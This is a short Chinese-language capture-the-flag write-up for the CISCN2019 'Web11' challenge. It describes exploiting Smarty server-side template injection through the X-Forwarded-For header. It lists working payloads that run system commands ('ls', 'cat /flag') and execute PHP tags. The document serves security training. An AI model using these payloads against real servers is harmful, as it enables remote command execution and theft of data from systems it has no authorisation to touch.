[CISCN2019 华东南赛区]Web11
掌握知识
IP
地址的Smarty
模板注入
解题思路
- 打开题目链接,发现是一个界面,通过对界面的查看似乎很多内容都指向
IP
,而且还有current ip
,xff
等字样。翻到最后面发现Smarty
字样,只有在ssti
模板注入见过该模块,怀疑又是和XFF
有关的的ssti
模板注入的题目
- 经过对页面的观测,注入点多半在
XFF
头,回显点就在current ip
,测试ssti
模板注入的paylaod
:{{7*7}}
,替换了原本的current ip
,输出49
-
使用常见的
Smarty
模板注入的paylaod
,先直接调用system
进行命令执行ls
,发现成功回显目录结构
-
发现没有
flag
,进而查看根目录发现flag
目录,直接使用cat命令,拿下flag
关键paylaod
{{7*7}}
{{system('ls')}}
{{system('ls /')}}
{{system('cat /flag')}}
smarty常用paylaod
{{system("ls")}}
{php}phpinfo();{/php} php标签
{if phpinfo()}{/if} if 标签